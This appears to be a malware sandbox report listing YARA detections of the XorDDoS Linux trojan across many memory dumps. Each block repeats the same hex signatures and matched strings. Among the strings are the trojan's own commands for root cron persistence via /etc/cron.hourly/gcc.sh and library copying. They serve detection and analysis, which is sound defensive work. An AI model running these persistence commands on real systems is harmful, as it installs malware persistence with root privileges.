6419.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6419.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6419.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6419.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6419.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6419.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6419.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6244.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6244.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6244.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6244.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6244.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6244.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6244.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6368.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6368.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6368.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6368.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6368.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6368.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6368.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6285.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6285.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6285.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6285.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6285.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6285.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6285.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6332.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6332.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6332.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6332.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6332.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6332.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6332.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6257.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6257.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6257.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6257.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6257.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6257.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6257.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6260.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6260.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6260.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6260.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6260.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6260.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6260.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6494.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6494.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6494.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6494.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6494.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6494.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6494.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6238.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6238.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6238.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6238.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6238.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6238.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6238.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6458.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6458.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6458.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6458.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6458.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6458.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6458.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6478.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6478.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6478.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6478.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6478.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6478.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6478.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6535.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6535.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6535.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6535.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6535.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6535.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6535.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
